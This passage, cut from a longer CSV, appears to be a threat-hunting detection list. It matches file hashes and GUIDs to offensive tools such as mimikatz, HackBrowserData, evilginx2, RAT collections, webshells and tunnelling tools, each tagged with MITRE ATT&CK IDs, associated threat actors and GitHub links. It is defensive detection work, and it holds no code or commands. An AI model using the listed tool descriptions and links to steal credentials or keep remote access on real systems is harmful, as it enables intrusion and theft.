and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","23532" "*26ee5086d8cc0404b7088ebe9e121e090261ce9185a9d4bf2394504fc8415f45*",".{0,1000}26ee5086d8cc0404b7088ebe9e121e090261ce9185a9d4bf2394504fc8415f45.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","23533" "*26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a*",".{0,1000}26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","23534" "*26fcb5597cb7d3eddd3bb24440de6555b3d34af4c9a3874b71fa27aff18ea3d5*",".{0,1000}26fcb5597cb7d3eddd3bb24440de6555b3d34af4c9a3874b71fa27aff18ea3d5.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23535" "*270261e8d576273808fa6084a665ca4251dc3bdd2cc849cfcdae2a042b21d8d3*",".{0,1000}270261e8d576273808fa6084a665ca4251dc3bdd2cc849cfcdae2a042b21d8d3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23536" "*2704649168fdd21796f1a46221a6e133105230e88070863976733d386a6ab204*",".{0,1000}2704649168fdd21796f1a46221a6e133105230e88070863976733d386a6ab204.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","23537" "*27049d9f4a7125e9be92e84edcad5dc118bc8503920fb3250b3e2f7577370b49*",".{0,1000}27049d9f4a7125e9be92e84edcad5dc118bc8503920fb3250b3e2f7577370b49.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","#filehash","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","23538" "*2709ef4de6f00a57c05cf4a39228cf87fa522abe20318aa4a09b34ba6cf7eea2*",".{0,1000}2709ef4de6f00a57c05cf4a39228cf87fa522abe20318aa4a09b34ba6cf7eea2.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","23539" 
"*270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1*",".{0,1000}270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23540" "*2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6*",".{0,1000}2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23541" "*2720ade6e794942ef6b2340db083e2e8ae392ca5ca08e71aae5329865b13e814*",".{0,1000}2720ade6e794942ef6b2340db083e2e8ae392ca5ca08e71aae5329865b13e814.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - 
TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","23542" "*272175f4d98a6ab59e2f589ba7391fc36659b04d0f27f9cb6a300cf49dfd2016*",".{0,1000}272175f4d98a6ab59e2f589ba7391fc36659b04d0f27f9cb6a300cf49dfd2016.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","23543" "*272dd72f9bdff7973ed8b642bf8713ece481e208a77fd03b6a24f2b520e1d49e*",".{0,1000}272dd72f9bdff7973ed8b642bf8713ece481e208a77fd03b6a24f2b520e1d49e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23546" "*27384243d50bfa14910b2a3993a1b42b8e44ce75bf94f3d17b1ee02a7ce66144*",".{0,1000}27384243d50bfa14910b2a3993a1b42b8e44ce75bf94f3d17b1ee02a7ce66144.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23548" "*27428e1d8aa5a20e6474049810d7615dd529c9671f331b9bf8f6c959ed36d7b5*",".{0,1000}27428e1d8aa5a20e6474049810d7615dd529c9671f331b9bf8f6c959ed36d7b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23550" "*2747fb657f7469ba916c90e46cf298bcb89d1fc92d8aa8956081db0e631c779b*",".{0,1000}2747fb657f7469ba916c90e46cf298bcb89d1fc92d8aa8956081db0e631c779b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23551" "*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23552" 
"*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23553" "*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23554" "*274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf*",".{0,1000}274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23555" 
"*274F19EC-7CBA-4FC7-80E6-BB41C1FE6728*",".{0,1000}274F19EC\-7CBA\-4FC7\-80E6\-BB41C1FE6728.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","#GUIDproject","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","23556" "*2759a95c63a2af0eed9d3202d961ddb72d4da05ea44653d400f9003e0a492064*",".{0,1000}2759a95c63a2af0eed9d3202d961ddb72d4da05ea44653d400f9003e0a492064.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","23557" "*2764294962b243eb9359e8678fd76af9b2dc2d061a78942b717eccc5f1a1aaad*",".{0,1000}2764294962b243eb9359e8678fd76af9b2dc2d061a78942b717eccc5f1a1aaad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23561" "*276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd*",".{0,1000}276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23562" "*277279ef4352ec8709c69d481ac9ef31fb1c07070999e229ce74ef76e57d5f84*",".{0,1000}277279ef4352ec8709c69d481ac9ef31fb1c07070999e229ce74ef76e57d5f84.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23564" "*27744baf01464354d336015e1051fdc6706235549f5e62e0230e139eb743b4bb*",".{0,1000}27744baf01464354d336015e1051fdc6706235549f5e62e0230e139eb743b4bb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23565" "*27758795eda198b3d41b490d11b0a33684b63aa2d33c716c65c2242d60b78838*",".{0,1000}27758795eda198b3d41b490d11b0a33684b63aa2d33c716c65c2242d60b78838.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23566" "*2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92*",".{0,1000}2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23567" "*277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d*",".{0,1000}277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23568" "*2787cc9e36cc2aebada79515e19ca4daf36887a091ec8f41af187c96df4147af*",".{0,1000}2787cc9e36cc2aebada79515e19ca4daf36887a091ec8f41af187c96df4147af.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","23571" "*278934b8bf08d452d343a4da60e7453aba6bee5b20a7d91eaaac571131a4b623*",".{0,1000}278934b8bf08d452d343a4da60e7453aba6bee5b20a7d91eaaac571131a4b623.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23572" "*2792b5ccfc554b6472ba069194bedae622380a34a8199e1e91be21a0dd1050c1*",".{0,1000}2792b5ccfc554b6472ba069194bedae622380a34a8199e1e91be21a0dd1050c1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23573" "*2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91*",".{0,1000}2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23574" "*279937cdd074cd255e0d4ee39b565440ea12cf4e23b1903a4c1cfa433e296b24*",".{0,1000}279937cdd074cd255e0d4ee39b565440ea12cf4e23b1903a4c1cfa433e296b24.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23575" "*27b23ebc1517a37b652dacbdc375db6220fa005bdfe4f7d522d6f1e277688541*",".{0,1000}27b23ebc1517a37b652dacbdc375db6220fa005bdfe4f7d522d6f1e277688541.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23577" "*27b5e167bc93846e1dd8175a36012073676173be8dc7c951bb4d8ac5fee576e0*",".{0,1000}27b5e167bc93846e1dd8175a36012073676173be8dc7c951bb4d8ac5fee576e0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23578" "*27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a*",".{0,1000}27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23581" "*27cc5348dd41818e79d5d87ee9d78e0f6ddc331f31c72ef0d4073f38d4fe4637*",".{0,1000}27cc5348dd41818e79d5d87ee9d78e0f6ddc331f31c72ef0d4073f38d4fe4637.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23582" 
"*27CF1AE0-5FDE-4B31-A4DA-6FAD1D77351D*",".{0,1000}27CF1AE0\-5FDE\-4B31\-A4DA\-6FAD1D77351D.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23583" "*27d206d156a0ede1cc521bb7d41588cd6c76c39ec4328c455923b718a52a4789*",".{0,1000}27d206d156a0ede1cc521bb7d41588cd6c76c39ec4328c455923b718a52a4789.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23584" 